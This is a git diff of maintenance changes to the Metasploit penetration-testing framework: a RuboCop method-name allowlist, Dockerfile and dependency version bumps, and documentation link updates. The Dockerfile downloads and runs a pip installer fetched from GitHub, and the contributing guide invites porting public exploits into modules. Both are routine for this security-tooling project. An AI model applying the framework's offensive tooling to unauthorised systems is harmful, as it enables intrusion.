+    - is_app_ssl_vpn?
+    - is_array_type?
+    - is_auth_required?
+    - is_author_blacklisted?
+    - is_badchar
+    - is_base64?
+    - is_bind?
+    - is_cached_size_accurate?
+    - is_cgi_enabled?
+    - is_cgi_exploitable?
+    - is_check_interesting?
+    - is_child_of?
+    - is_clr_enabled
+    - is_connect?
+    - is_dlink?
+    - is_dn?
+    - is_dynamic?
+    - is_error_code
+    - is_exception?
+    - is_exploit_module?
+    - is_exploitable?
+    - is_fqdn?
+    - is_glob?
+    - is_groupwise?
+    - is_guest_mode_enabled?
+    - is_hash_from_empty_pwd?
+    - is_high_integrity?
+    - is_hostname?
+    - is_ie?
+    - is_imc?
+    - is_imc_som?
+    - is_in_admin_group?
+    - is_interface?
+    - is_ip_targeted?
+    - is_key_wanted?
+    - is_leaf?
+    - is_local?
+    - is_logged_in?
+    - is_loggedin
+    - is_loopback_address?
+    - is_mac?
+    - is_match
+    - is_md5_format?
+    - is_module_arch?
+    - is_module_platform?
+    - is_module_wanted?
+    - is_multi_platform_exploit?
+    - is_not_null?
+    - is_null_pointer
+    - is_null_pointer?
+    - is_num?
+    - is_num_type?
+    - is_numeric
+    - is_online?
+    - is_parseable
+    - is_pass_ntlm_hash?
+    - is_passwd_method?
+    - is_password_required?
+    - is_payload_compatible?
+    - is_payload_platform_compatible?
+    - is_pointer_type?
+    - is_pri_key?
+    - is_proficy?
+    - is_rdp_up
+    - is_remote_exploit?
+    - is_resource_taken?
+    - is_rf?
+    - is_rmi?
+    - is_root?
+    - is_routable?
+    - is_running?
+    - is_scan_complete
+    - is_secure_admin_disabled?
+    - is_session_type?
+    - is_signature_correct?
+    - is_single_object?
+    - is_struct_type?
+    - is_supermicro?
+    - is_superuser?
+    - is_sws?
+    - is_system?
+    - is_system_user?
+    - is_target?
+    - is_target_suitable?
+    - is_trial_enabled?
+    - is_trustworthy
+    - is_uac_enabled?
+    - is_url_alive
+    - is_usable?
+    - is_uuid?
+    - is_valid?
+    - is_valid_bus?
+    - is_valid_snmp_value
+    - is_value_wanted?
+    - is_version_compat?
+    - is_version_tested?
+    - is_vmware?
+    - is_vul
+    - is_vulnerable?
+    - is_warbird?
+    - is_windows?
+    - is_writable
+    - is_writable?
+    - is_x86?
+    - is_zigbee_hwbridge_session?
+
 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
 Style/RedundantPercentQ:
@@ -1 +1 @@
-3.0.2
+3.0.5
@@ -0,0 +1,28 @@
+---
+include:
+- "**/*.rb"
+exclude:
+- spec/**/*
+- test/**/*
+- vendor/**/*
+- ".bundle/**/*"
+- modules/**/*
+- data/**/*
+- db/**/*
+- external/**/*
+- plugins/**/*
+- scripts/**/* # Some of this is old and may not need indexing???
+require: []
+domains: []
+reporters:
+- rubocop
+- require_not_found
+formatter:
+  rubocop:
+    cops: safe
+    except: []
+    only: []
+    extra_args: []
+require_paths: []
+plugins: []
+max_files: 0
@@ -36,7 +36,7 @@ when an individual is representing the project or its community.

 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
-the incident involves a committer, you may report directly to
+the incident involves a committer, you may report it directly to
 caitlin_condon@rapid7.com or todb@metasploit.com.

 All complaints will be reviewed and investigated and will result in a
@@ -1,6 +1,6 @@
 # Contributing to Metasploit
 Thank you for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.
+world -- a better place!  Before you get started, please review our [Code of Conduct](./CODE_OF_CONDUCT.md). This helps us ensure our community is positive and supportive for everyone involved.

 ## Code Free Contributions
 Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
@@ -15,9 +15,9 @@ Before we get into the details of contributing code, you should know there are m


 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.

-Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.

 Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
 will be closed. We need to ensure the code we're adding to master is written to a high standard.
@@ -83,7 +83,7 @@ If you need some more guidance, talk to the main body of open source contributor
 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!

-[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
+[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
 [Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
 [Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
 [help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
@@ -101,7 +101,7 @@ curve, so keep it up!
 [PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
+[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://www.betterspecs.org/
@@ -1,4 +1,4 @@
-FROM ruby:3.0.2-alpine3.12 AS builder
+FROM ruby:3.0.5-alpine3.15 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -40,15 +40,16 @@ RUN apk add --no-cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle

+ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
-    tar -zxf go1.11.2.src.tar.gz && \
-    rm go1.11.2.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.21.1.src.tar.gz && \
+    tar -zxf go1.21.1.src.tar.gz && \
+    rm go1.21.1.src.tar.gz && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.2-alpine3.12
+FROM ruby:3.0.5-alpine3.15
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -59,7 +60,9 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm mingw-w64-gcc
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+    openssl-dev nasm mingw-w64-gcc

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -72,7 +75,7 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
+RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
 RUN pip install impacket
 RUN pip install requests

@@ -16,6 +16,9 @@ group :development do
  gem 'yard'
  # for development and testing purposes
  gem 'pry-byebug'
+  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
+  # Replaces the old lib/debug.rb and provides more features.
+  gem 'debug', '>= 1.0.0'
  # module documentation
  gem 'octokit'
  # memory profiling
@@ -24,25 +27,28 @@ group :development do
  gem 'ruby-prof', '1.4.2'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  # gem 'metasploit-aggregator'
 end

 group :development, :test do
-  # automatically include factories from spec/factories
-  gem 'factory_bot_rails'
-  # Make rspec output shorter and more useful
-  gem 'fivemat'
  # running documentation generation tasks and rspec tasks
  gem 'rake'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  # Required during CI as well local development
  gem 'rubocop'
 end

 group :test do
+  # automatically include factories from spec/factories
+  gem 'test-prof'
+  gem 'factory_bot_rails'
+  # Make rspec output shorter and more useful
+  gem 'fivemat'
+  # rspec formatter for acceptance tests
+  gem 'allure-rspec'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
-
@@ -1,17 +1,20 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.9)
-      actionpack (~> 6.0)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-framework (6.3.39)
+      actionpack (~> 7.0.0)
+      activerecord (~> 7.0.0)
+      activesupport (~> 7.0.0)
      aws-sdk-ec2
+      aws-sdk-ec2instanceconnect
      aws-sdk-iam
      aws-sdk-s3
+      aws-sdk-ssm
      bcrypt
      bcrypt_pbkdf
+      bootsnap
      bson
-      concurrent-ruby (= 1.0.5)
+      chunky_png
      dnsruby
      ed25519
      em-http-request
@@ -23,26 +26,27 @@ PATH
      filesize
      hrr_rb_ssh-ed25519
      http-cookie
-      irb
+      irb (~> 1.7.4)
      jsobfu
      json
      metasm
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.94)
+      metasploit-payloads (= 2.0.156)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.18)
+      metasploit_payloads-mettle (= 1.0.26)
      mqtt
-      msgpack
+      msgpack (~> 1.6.0)
      nessus_rest
+      net-imap
      net-ldap
      net-smtp
      net-ssh
      network_interface
      nexpose
-      nokogiri
-      octokit
+      nokogiri (~> 1.14.0)
+      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
      packetfu
@@ -52,10 +56,10 @@ PATH
      pg
      puma
      railties
+      rasn1
      rb-readline
      recog
      redcarpet
-      reline (= 0.2.5)
      rex-arch
      rex-bin_tools
      rex-core
@@ -75,7 +79,8 @@ PATH
      rex-text
      rex-zip
      ruby-macho
-      ruby_smb (~> 3.1.0)
+      ruby-mysql
+      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
      sinatra
@@ -98,73 +103,93 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.6)
-      actionview (= 6.1.6)
-      activesupport (= 6.1.6)
-      rack (~> 2.0, >= 2.0.9)
+    actionpack (7.0.8)
+      actionview (= 7.0.8)
+      activesupport (= 7.0.8)
+      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.6)
-      activesupport (= 6.1.6)
+    actionview (7.0.8)
+      activesupport (= 7.0.8)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.6)
-      activesupport (= 6.1.6)
-    activerecord (6.1.6)
-      activemodel (= 6.1.6)
-      activesupport (= 6.1.6)
-    activesupport (6.1.6)
+    activemodel (7.0.8)
+      activesupport (= 7.0.8)
+    activerecord (7.0.8)
+      activemodel (= 7.0.8)
+      activesupport (= 7.0.8)
+    activesupport (7.0.8)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-      zeitwerk (~> 2.3)
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.5)
+      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
+    allure-rspec (2.23.0)
+      allure-ruby-commons (= 2.23.0)
+      rspec-core (>= 3.8, < 4)
+    allure-ruby-commons (2.23.0)
+      mime-types (>= 3.3, < 4)
+      require_all (>= 2, < 4)
+      rspec-expectations (~> 3.12)
+      uuid (>= 2.3, < 3)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.602.0)
-    aws-sdk-core (3.131.2)
+    aws-partitions (1.834.0)
+    aws-sdk-core (3.185.1)
      aws-eventstream (~> 1, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.525.0)
-      aws-sigv4 (~> 1.1)
+      aws-partitions (~> 1, >= 1.651.0)
+      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.320.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-ec2 (1.411.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.69.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-ec2instanceconnect (1.34.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.57.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-iam (1.87.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.114.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-kms (1.72.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.1)
+    aws-sdk-s3 (1.136.0)
+      aws-sdk-core (~> 3, >= 3.181.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.4)
-    aws-sigv4 (1.5.0)
+      aws-sigv4 (~> 1.6)
+    aws-sdk-ssm (1.158.0)
+      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.1)
+    aws-sigv4 (1.6.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.18)
+    base64 (0.1.1)
+    bcrypt (3.1.19)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.10)
+    bindata (2.4.15)
+    bootsnap (1.16.0)
+      msgpack (~> 1.2)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
+    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.0.5)
+    concurrent-ruby (1.2.2)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
+    date (3.3.3)
+    debug (1.8.0)
+      irb (>= 1.5.0)
+      reline (>= 0.3.1)
    diff-lcs (1.5.0)
-    digest (3.1.0)
-    dnsruby (1.61.9)
-      simpleidn (~> 0.1)
+    dnsruby (1.70.0)
+      simpleidn (~> 0.2.1)
    docile (1.4.0)
    domain_name (0.5.20190701)
      unf (>= 0.0.5, < 1.0.0)
@@ -177,25 +202,26 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.10.0)
+    erubi (1.12.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.21.0)
+    faker (3.2.1)
      i18n (>= 1.8.11, < 2)
-    faraday (2.3.0)
-      faraday-net_http (~> 2.0)
+    faraday (2.7.11)
+      base64
+      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (2.0.3)
-    faraday-retry (2.0.0)
+    faraday-net_http (3.0.2)
+    faraday-retry (2.2.0)
      faraday (~> 2.0)
-    faye-websocket (0.11.1)
+    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
-    ffi (1.15.5)
+    ffi (1.16.3)
    filesize (0.2.0)
    fivemat (1.3.7)
    gssapi (1.3.1)
@@ -212,29 +238,33 @@ GEM
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.10.0)
+    i18n (1.14.1)
      concurrent-ruby (~> 1.0)
-    io-console (0.5.11)
-    irb (1.3.6)
-      reline (>= 0.2.5)
-    jmespath (1.6.1)
+    io-console (0.6.0)
+    irb (1.7.4)
+      reline (>= 0.3.6)
+    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.6.2)
+    json (2.6.3)
+    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.18.0)
+    loofah (2.21.3)
      crass (~> 1.0.2)
-      nokogiri (>= 1.5.9)
-    memory_profiler (1.0.0)
+      nokogiri (>= 1.12.0)
+    macaddr (1.7.2)
+      systemu (~> 2.6.5)
+    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (4.0.4)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-credential (5.0.7)
+    metasploit-concern (5.0.2)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+      zeitwerk
+    metasploit-credential (6.0.6)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -244,192 +274,206 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.5)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-payloads (2.0.94)
-    metasploit_data_models (5.0.5)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-model (5.0.2)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+    metasploit-payloads (2.0.156)
+    metasploit_data_models (6.0.3)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      arel-helpers
      metasploit-concern
      metasploit-model (>= 3.1)
      pg
-      railties (~> 6.0)
-      recog (~> 2.0)
+      railties (~> 7.0)
+      recog
      webrick
-    metasploit_payloads-mettle (1.0.18)
+    metasploit_payloads-mettle (1.0.26)
    method_source (1.0.0)
-    mini_portile2 (2.8.0)
-    minitest (5.16.1)
-    mqtt (0.5.0)
-    msgpack (1.5.3)
+    mime-types (3.5.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2023.1003)
+    mini_portile2 (2.8.4)
+    minitest (5.20.0)
+    mqtt (0.6.0)
+    msgpack (1.6.1)
    multi_json (1.15.0)
-    mustermann (1.1.1)
+    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.17.1)
-    net-protocol (0.1.3)
-      timeout
-    net-smtp (0.3.1)
-      digest
+    net-imap (0.4.0)
+      date
      net-protocol
+    net-ldap (0.18.0)
+    net-protocol (0.2.1)
      timeout
-    net-ssh (7.0.1)
-    network_interface (0.0.2)
+    net-smtp (0.4.0)
+      net-protocol
+    net-ssh (7.2.0)
+    network_interface (0.0.4)
    nexpose (7.3.0)
-    nio4r (2.5.8)
-    nokogiri (1.13.6)
+    nio4r (2.5.9)
+    nokogiri (1.14.5)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
-    openssl-ccm (1.2.2)
-    openssl-cmac (2.0.1)
+    openssl-ccm (1.2.3)
+    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
-    packetfu (1.1.13)
-      pcaprub
-    parallel (1.22.1)
-    parser (3.1.2.0)
+    packetfu (2.0.0)
+      pcaprub (~> 0.13.1)
+    parallel (1.23.0)
+    parser (3.2.2.4)
      ast (~> 2.4.1)
+      racc
    patch_finder (1.0.2)
    pcaprub (0.13.1)
-    pdf-reader (2.10.0)
+    pdf-reader (2.11.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.4.1)
-    pry (0.13.1)
+    pg (1.5.4)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.9.0)
+    pry-byebug (3.10.1)
      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (4.0.7)
-    puma (5.6.4)
+      pry (>= 0.13, < 0.15)
+    public_suffix (5.0.3)
+    puma (6.4.0)
      nio4r (~> 2.0)
-    racc (1.6.0)
-    rack (2.2.4)
-    rack-protection (2.2.0)
-      rack
-    rack-test (2.0.2)
+    racc (1.7.1)
+    rack (2.2.8)
+    rack-protection (3.1.0)
+      rack (~> 2.2, >= 2.2.4)
+    rack-test (2.1.0)
      rack (>= 1.3)
-    rails-dom-testing (2.0.3)
-      activesupport (>= 4.2.0)
+    rails-dom-testing (2.2.0)
+      activesupport (>= 5.0.0)
+      minitest
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.3)
-      loofah (~> 2.3)
-    railties (6.1.6)
-      actionpack (= 6.1.6)
-      activesupport (= 6.1.6)
+    rails-html-sanitizer (1.6.0)
+      loofah (~> 2.21)
+      nokogiri (~> 1.14)
+    railties (7.0.8)
+      actionpack (= 7.0.8)
+      activesupport (= 7.0.8)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
+      zeitwerk (~> 2.5)
    rainbow (3.1.1)
    rake (13.0.6)
+    rasn1 (0.12.1)
+      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (2.3.23)
+    recog (3.1.2)
      nokogiri
-    redcarpet (3.5.1)
-    regexp_parser (2.5.0)
-    reline (0.2.5)
+    redcarpet (3.6.0)
+    regexp_parser (2.8.1)
+    reline (0.3.8)
      io-console (~> 0.5)
-    rex-arch (0.1.14)
+    require_all (3.0.0)
+    rex-arch (0.1.15)
      rex-text
-    rex-bin_tools (0.1.8)
+    rex-bin_tools (0.1.9)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.28)
-    rex-encoder (0.1.6)
+    rex-core (0.1.31)
+    rex-encoder (0.1.7)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.33)
+    rex-exploitation (0.1.39)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
      rexml
-    rex-java (0.1.6)
-    rex-mime (0.1.7)
+    rex-java (0.1.7)
+    rex-mime (0.1.8)
      rex-text
-    rex-nop (0.1.2)
+    rex-nop (0.1.3)
      rex-arch
-    rex-ole (0.1.7)
+    rex-ole (0.1.8)
      rex-text
-    rex-powershell (0.1.96)
+    rex-powershell (0.1.99)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.8)
+    rex-random_identifier (0.1.11)
      rex-text
-    rex-registry (0.1.4)
-    rex-rop_builder (0.1.4)
+    rex-registry (0.1.5)
+    rex-rop_builder (0.1.5)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.40)
+    rex-socket (0.1.54)
      rex-core
-    rex-sslscan (0.1.7)
+    rex-sslscan (0.1.10)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.3)
-    rex-text (0.2.38)
-    rex-zip (0.1.4)
+    rex-struct2 (0.1.4)
+    rex-text (0.2.53)
+    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.5)
+    rexml (3.2.6)
    rkelly-remix (0.0.7)
-    rspec (3.11.0)
-      rspec-core (~> 3.11.0)
-      rspec-expectations (~> 3.11.0)
-      rspec-mocks (~> 3.11.0)
-    rspec-core (3.11.0)
-      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.0)
+    rspec (3.12.0)
+      rspec-core (~> 3.12.0)
+      rspec-expectations (~> 3.12.0)
+      rspec-mocks (~> 3.12.0)
+    rspec-core (3.12.2)
+      rspec-support (~> 3.12.0)
+    rspec-expectations (3.12.3)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-mocks (3.11.1)
+      rspec-support (~> 3.12.0)
+    rspec-mocks (3.12.6)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-rails (5.1.2)
-      actionpack (>= 5.2)
-      activesupport (>= 5.2)
-      railties (>= 5.2)
-      rspec-core (~> 3.10)
-      rspec-expectations (~> 3.10)
-      rspec-mocks (~> 3.10)
-      rspec-support (~> 3.10)
+      rspec-support (~> 3.12.0)
+    rspec-rails (6.0.3)
+      actionpack (>= 6.1)
+      activesupport (>= 6.1)
+      railties (>= 6.1)
+      rspec-core (~> 3.12)
+      rspec-expectations (~> 3.12)
+      rspec-mocks (~> 3.12)
+      rspec-support (~> 3.12)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.0)
-    rubocop (1.31.1)
+    rspec-support (3.12.1)
+    rubocop (1.56.4)
+      base64 (~> 0.1.1)
      json (~> 2.3)
+      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
-      parser (>= 3.1.0.0)
+      parser (>= 3.2.2.3)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.18.0, < 2.0)
+      rubocop-ast (>= 1.28.1, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.18.0)
-      parser (>= 3.1.1.0)
-    ruby-macho (3.0.0)
+      unicode-display_width (>= 2.4.0, < 3.0)
+    rubocop-ast (1.29.0)
+      parser (>= 3.2.1.0)
+    ruby-macho (4.0.0)
+    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
-    ruby-progressbar (1.11.0)
+    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.1.6)
+    ruby_smb (3.2.5)
      bindata
      openssl-ccm
      openssl-cmac
@@ -446,40 +490,46 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (2.2.0)
-      mustermann (~> 1.0)
-      rack (~> 2.2)
-      rack-protection (= 2.2.0)
+    sinatra (3.1.0)
+      mustermann (~> 3.0)
+      rack (~> 2.2, >= 2.2.4)
+      rack-protection (= 3.1.0)
      tilt (~> 2.0)
-    sqlite3 (1.4.4)
-    sshkey (2.0.0)
+    sqlite3 (1.6.6)
+      mini_portile2 (~> 2.8.0)
+    sshkey (3.0.0)
+    strptime (0.2.5)
    swagger-blocks (3.0.0)
-    thin (1.8.1)
+    systemu (2.6.5)
+    test-prof (1.2.3)
+    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.2.1)
-    tilt (2.0.10)
-    timecop (0.9.5)
-    timeout (0.3.0)
+    thor (1.2.2)
+    tilt (2.3.0)
+    timecop (0.9.8)
+    timeout (0.4.0)
    ttfunk (1.7.0)
-    tzinfo (2.0.4)
+    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.1)
+    tzinfo-data (1.2023.3)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.2.0)
-    unix-crypt (1.3.0)
+    unicode-display_width (2.5.0)
+    unix-crypt (1.3.1)
+    uuid (2.3.9)
+      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webrick (1.7.0)
-    websocket-driver (0.7.5)
+    webrick (1.8.1)
+    websocket-driver (0.7.6)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
-    windows_error (0.1.4)
+    windows_error (0.1.5)
    winrm (2.3.6)
      builder (>= 2.1.2)
      erubi (~> 1.8)
@@ -492,16 +542,17 @@ GEM
    xdr (3.0.3)
